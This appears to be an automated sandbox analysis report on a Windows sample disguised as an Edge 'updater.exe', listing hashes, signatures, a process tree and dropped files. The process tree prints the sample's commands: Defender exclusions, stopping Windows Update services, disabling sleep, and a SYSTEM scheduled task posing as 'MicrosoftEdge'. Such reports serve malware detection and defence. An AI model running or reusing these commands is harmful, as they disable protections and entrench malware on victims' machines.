Analysis

  • max time kernel
    98s
  • max time network
    154s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags

    arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
  • submitted
    26/08/2024, 05:22

General

  • Target

    updater.exe

  • Size

    5.7MB

  • MD5

    8cd62e3ece85c4c3e9f6f7c816256adf

  • SHA1

    9712769be3f755c5ecbe68d38800a3a8ecdaf324

  • SHA256

    39ebcdbb6993787be2ed9d2b6668b9ee2707ca483a66b51d1302bfc610ba021b

  • SHA512

    a0aa9f0e6542c526fc18d48ab945d8be3245900381c9640f6e122a633a15dd9a9364bacd830fbc588a926ebef8240300c1fbf4211eae600cff8b7e2c63613501

  • SSDEEP

    98304:mqH5yorsiuEImTRqgWj/PDDKlATbRsk7YAChRmaUKIJT:mq9r+EIWkj3DDKaxJQRm5LJT

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 1 IoCs
  • Power Settings 1 TTPs 10 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:596
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1004
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:652
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
        1⤵
          PID:752
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
          1⤵
            PID:908
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
            1⤵
              PID:380
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
              1⤵
                PID:420
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
                1⤵
                  PID:404
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                  1⤵
                    PID:592
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1084
                    • c:\windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:3044
                      • C:\Program Files\Microsoft\Edge\updater.exe
                        "C:\Program Files\Microsoft\Edge\updater.exe"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Drops file in Program Files directory
                        PID:3656
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                      1⤵
                        PID:1100
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                        1⤵
                          PID:1176
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k localservice -s nsi
                          1⤵
                            PID:1208
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s Themes
                            1⤵
                              PID:1320
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k localservice -s EventSystem
                              1⤵
                                PID:1328
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                                1⤵
                                  PID:1384
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                  1⤵
                                    PID:1404
                                    • c:\windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:2916
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                      1⤵
                                        PID:1488
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                        1⤵
                                          PID:1540
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                          1⤵
                                            PID:1584
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                            1⤵
                                              PID:1592
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                              1⤵
                                                PID:1680
                                              • c:\windows\system32\svchost.exe
                                                c:\windows\system32\svchost.exe -k localservice -s netprofm
                                                1⤵
                                                  PID:1696
                                                • c:\windows\system32\svchost.exe
                                                  c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                  1⤵
                                                    PID:1788
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                    1⤵
                                                      PID:1864
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                      1⤵
                                                        PID:1884
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                        1⤵
                                                          PID:1960
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2036
                                                          • c:\windows\system32\svchost.exe
                                                            c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                            1⤵
                                                              PID:1548
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                              1⤵
                                                                PID:2264
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                                1⤵
                                                                  PID:2272
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                  1⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2316
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                                  1⤵
                                                                    PID:2416
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                    1⤵
                                                                      PID:2468
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                      1⤵
                                                                        PID:2480
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2516
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                          1⤵
                                                                            PID:2528
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                            1⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2536
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                            1⤵
                                                                              PID:2556
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                              1⤵
                                                                                PID:2940
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                                1⤵
                                                                                  PID:1296
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3092
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                    PID:3304
                                                                                    • C:\Users\Admin\AppData\Local\Temp\updater.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\updater.exe"
                                                                                      2⤵
                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                      • Suspicious use of SetThreadContext
                                                                                      • Drops file in Program Files directory
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1604
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                      2⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3284
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                      2⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4524
                                                                                      • C:\Windows\System32\sc.exe
                                                                                        sc stop UsoSvc
                                                                                        3⤵
                                                                                        • Launches sc.exe
                                                                                        PID:1348
                                                                                      • C:\Windows\System32\sc.exe
                                                                                        sc stop WaaSMedicSvc
                                                                                        3⤵
                                                                                        • Launches sc.exe
                                                                                        PID:304
                                                                                      • C:\Windows\System32\sc.exe
                                                                                        sc stop wuauserv
                                                                                        3⤵
                                                                                        • Launches sc.exe
                                                                                        PID:4636
                                                                                      • C:\Windows\System32\sc.exe
                                                                                        sc stop bits
                                                                                        3⤵
                                                                                        • Launches sc.exe
                                                                                        PID:3544
                                                                                      • C:\Windows\System32\sc.exe
                                                                                        sc stop dosvc
                                                                                        3⤵
                                                                                        • Launches sc.exe
                                                                                        PID:5036
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                      2⤵
                                                                                      • Power Settings
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:3124
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        3⤵
                                                                                          PID:2120
                                                                                        • C:\Windows\System32\powercfg.exe
                                                                                          powercfg /x -hibernate-timeout-ac 0
                                                                                          3⤵
                                                                                          • Power Settings
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2952
                                                                                        • C:\Windows\System32\powercfg.exe
                                                                                          powercfg /x -hibernate-timeout-dc 0
                                                                                          3⤵
                                                                                          • Power Settings
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2712
                                                                                        • C:\Windows\System32\powercfg.exe
                                                                                          powercfg /x -standby-timeout-ac 0
                                                                                          3⤵
                                                                                          • Power Settings
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1336
                                                                                        • C:\Windows\System32\powercfg.exe
                                                                                          powercfg /x -standby-timeout-dc 0
                                                                                          3⤵
                                                                                          • Power Settings
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2296
                                                                                      • C:\Windows\System32\dialer.exe
                                                                                        C:\Windows\System32\dialer.exe
                                                                                        2⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4804
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lfvbfbo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MicrosoftEdge' /tr '''C:\Program Files\Microsoft\Edge\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Microsoft\Edge\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MicrosoftEdge' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                        2⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3168
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          3⤵
                                                                                            PID:3792
                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                          C:\Windows\System32\schtasks.exe /run /tn "MicrosoftEdge"
                                                                                          2⤵
                                                                                            PID:3280
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              3⤵
                                                                                                PID:4444
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                              2⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Drops file in System32 directory
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:1720
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                3⤵
                                                                                                  PID:1628
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                2⤵
                                                                                                  PID:3820
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    3⤵
                                                                                                      PID:4328
                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                      sc stop UsoSvc
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:4920
                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                      sc stop WaaSMedicSvc
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:3668
                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                      sc stop wuauserv
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:1268
                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                      sc stop bits
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:3340
                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                      sc stop dosvc
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:1504
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                    2⤵
                                                                                                    • Power Settings
                                                                                                    PID:2872
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      3⤵
                                                                                                        PID:4160
                                                                                                      • C:\Windows\System32\powercfg.exe
                                                                                                        powercfg /x -hibernate-timeout-ac 0
                                                                                                        3⤵
                                                                                                        • Power Settings
                                                                                                        PID:4136
                                                                                                      • C:\Windows\System32\powercfg.exe
                                                                                                        powercfg /x -hibernate-timeout-dc 0
                                                                                                        3⤵
                                                                                                        • Power Settings
                                                                                                        PID:4192
                                                                                                      • C:\Windows\System32\powercfg.exe
                                                                                                        powercfg /x -standby-timeout-ac 0
                                                                                                        3⤵
                                                                                                        • Power Settings
                                                                                                        PID:5088
                                                                                                      • C:\Windows\System32\powercfg.exe
                                                                                                        powercfg /x -standby-timeout-dc 0
                                                                                                        3⤵
                                                                                                        • Power Settings
                                                                                                        PID:4208
                                                                                                    • C:\Windows\System32\dialer.exe
                                                                                                      C:\Windows\System32\dialer.exe
                                                                                                      2⤵
                                                                                                        PID:4132
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lfvbfbo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MicrosoftEdge' /tr '''C:\Program Files\Microsoft\Edge\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Microsoft\Edge\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MicrosoftEdge' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                                        2⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:2192
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          3⤵
                                                                                                            PID:208
                                                                                                        • C:\Windows\System32\dialer.exe
                                                                                                          C:\Windows\System32\dialer.exe
                                                                                                          2⤵
                                                                                                            PID:4508
                                                                                                          • C:\Windows\System32\dialer.exe
                                                                                                            C:\Windows\System32\dialer.exe
                                                                                                            2⤵
                                                                                                              PID:2000
                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:3920
                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                              1⤵
                                                                                                                PID:3356
                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                                                1⤵
                                                                                                                  PID:4672
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                                                  1⤵
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:440
                                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                  1⤵
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:4680
                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                                  1⤵
                                                                                                                    PID:2340
                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                    1⤵
                                                                                                                      PID:3056
                                                                                                                    • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                                      C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:4268
                                                                                                                      • C:\Windows\System32\InstallAgent.exe
                                                                                                                        C:\Windows\System32\InstallAgent.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:1204

                                                                                                                        Network

                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                        Replay Monitor

                                                                                                                        Loading Replay Monitor...

                                                                                                                        Downloads

                                                                                                                        • C:\Program Files\Microsoft\Edge\updater.exe

                                                                                                                          Filesize

                                                                                                                          5.7MB

                                                                                                                          MD5

                                                                                                                          8cd62e3ece85c4c3e9f6f7c816256adf

                                                                                                                          SHA1

                                                                                                                          9712769be3f755c5ecbe68d38800a3a8ecdaf324

                                                                                                                          SHA256

                                                                                                                          39ebcdbb6993787be2ed9d2b6668b9ee2707ca483a66b51d1302bfc610ba021b

                                                                                                                          SHA512

                                                                                                                          a0aa9f0e6542c526fc18d48ab945d8be3245900381c9640f6e122a633a15dd9a9364bacd830fbc588a926ebef8240300c1fbf4211eae600cff8b7e2c63613501

                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                          Filesize

                                                                                                                          3KB

                                                                                                                          MD5

                                                                                                                          8592ba100a78835a6b94d5949e13dfc1

                                                                                                                          SHA1

                                                                                                                          63e901200ab9a57c7dd4c078d7f75dcd3b357020

                                                                                                                          SHA256

                                                                                                                          fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

                                                                                                                          SHA512

                                                                                                                          87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                          Filesize

                                                                                                                          1KB

                                                                                                                          MD5

                                                                                                                          6fa43f4c3e9632166db2e70bbd7edc54

                                                                                                                          SHA1

                                                                                                                          51a5f8b40b3a0764bfa4e2491e66a8147b836966

                                                                                                                          SHA256

                                                                                                                          7a5f26aa1141fcc8194a38716bb0c3579079ab146415427cdab91a944d2cdf29

                                                                                                                          SHA512

                                                                                                                          3bd20c480371b4d58a65bc7e9ee7ce31a1106f70fd4140baf7b96f861b7a58d6ec3e8c4b0b9dffa8b7bbe35ae77e00b6a093f8157f189ea16f0fa331aa984309

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wgk1iwx3.5iv.ps1

                                                                                                                          Filesize

                                                                                                                          1B

                                                                                                                          MD5

                                                                                                                          c4ca4238a0b923820dcc509a6f75849b

                                                                                                                          SHA1

                                                                                                                          356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                                          SHA256

                                                                                                                          6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                                          SHA512

                                                                                                                          4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                                        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                          Filesize

                                                                                                                          3KB

                                                                                                                          MD5

                                                                                                                          811d351aabd7b708fef7683cf5e29e15

                                                                                                                          SHA1

                                                                                                                          06fd89e5a575f45d411cf4b3a2d277e642e73dbb

                                                                                                                          SHA256

                                                                                                                          0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18

                                                                                                                          SHA512

                                                                                                                          702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a

                                                                                                                        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                          Filesize

                                                                                                                          1KB

                                                                                                                          MD5

                                                                                                                          302a7c179ef577c237c5418fb770fd27

                                                                                                                          SHA1

                                                                                                                          343ef00d1357a8d2ff6e1143541a8a29435ed30c

                                                                                                                          SHA256

                                                                                                                          9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f

                                                                                                                          SHA512

                                                                                                                          f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699

                                                                                                                        • memory/596-60-0x00000252EB6D0000-0x00000252EB6F7000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          156KB

                                                                                                                        • memory/596-61-0x00007FFDBC100000-0x00007FFDBC110000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/596-59-0x00000252EB2E0000-0x00000252EB301000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          132KB

                                                                                                                        • memory/652-65-0x00007FFDBC100000-0x00007FFDBC110000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/652-64-0x0000026D92370000-0x0000026D92397000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          156KB

                                                                                                                        • memory/1004-72-0x00007FFDBC100000-0x00007FFDBC110000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/1004-71-0x000002166A2D0000-0x000002166A2F7000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          156KB

                                                                                                                        • memory/1604-0-0x00007FF772E10000-0x00007FF7733D5000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.8MB

                                                                                                                        • memory/1720-409-0x0000026CF5900000-0x0000026CF59B9000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          740KB

                                                                                                                        • memory/1720-403-0x0000026CF5400000-0x0000026CF541C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          112KB

                                                                                                                        • memory/1720-442-0x0000026CF5420000-0x0000026CF542A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          40KB

                                                                                                                        • memory/2192-983-0x000002DABA9B0000-0x000002DABA9CC000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          112KB

                                                                                                                        • memory/3284-11-0x0000021A6F8C0000-0x0000021A6F936000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          472KB

                                                                                                                        • memory/3284-40-0x00007FFDE04A0000-0x00007FFDE0E8C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          9.9MB

                                                                                                                        • memory/3284-4-0x00007FFDE04A3000-0x00007FFDE04A4000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/3284-8-0x00007FFDE04A0000-0x00007FFDE0E8C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          9.9MB

                                                                                                                        • memory/3284-7-0x00007FFDE04A0000-0x00007FFDE0E8C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          9.9MB

                                                                                                                        • memory/3284-51-0x00007FFDE04A0000-0x00007FFDE0E8C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          9.9MB

                                                                                                                        • memory/3284-6-0x0000021A6F790000-0x0000021A6F7B2000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          136KB

                                                                                                                        • memory/3284-50-0x00007FFDE04A0000-0x00007FFDE0E8C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          9.9MB

                                                                                                                        • memory/3304-114-0x0000000000C80000-0x0000000000CA7000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          156KB

                                                                                                                        • memory/3304-115-0x00007FFDBC100000-0x00007FFDBC110000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/4804-53-0x00007FFDFC070000-0x00007FFDFC24B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          1.9MB

                                                                                                                        • memory/4804-54-0x00007FFDF9870000-0x00007FFDF991E000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          696KB